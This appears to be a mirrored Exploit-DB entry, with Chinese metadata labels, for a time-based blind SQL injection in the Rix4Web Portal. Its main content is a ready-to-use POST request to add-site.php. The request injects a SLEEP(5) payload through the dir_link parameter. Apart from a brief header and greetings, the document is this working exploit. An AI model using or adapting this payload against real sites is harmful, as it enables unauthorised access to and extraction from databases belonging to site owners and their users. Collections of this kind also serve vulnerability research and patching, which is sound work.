Rix4Web Portal – Blind SQL Injection

  • 作者: L0n3ly-H34rT
    日期: 2013-02-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/24542/
  • ################################################
    ### Exploit Title: Rix4Web Portal Remote Blind SQL Injection Vulnerability
    ### Date: 02/23/2013 
    ### Author: L0n3ly-H34rT 
    ### Contact: l0n3ly_h34rt@hotmail.com 
    ### My Site: http://se3c.blogspot.com/ 
    ### Vendor Link: http://www.rix4web.com/
    ### Software Link: http://www.traidnt.net/vb/traidnt2230161/
    ### Tested on: Linux/Windows 
    ################################################
    
    # AND time-based blind In POST:
    
    POST http://127.0.0.1/rix/add-site.php?do=addnew&go=add
    
    cat_id=1&dir_link=http://www.google.com/' AND SLEEP(5) AND 'test'='test&dir_short=1&dir_title=Mr.
    
    # Just inject : dir_link
    
    ################################################
    
    # Greetz To My Friendz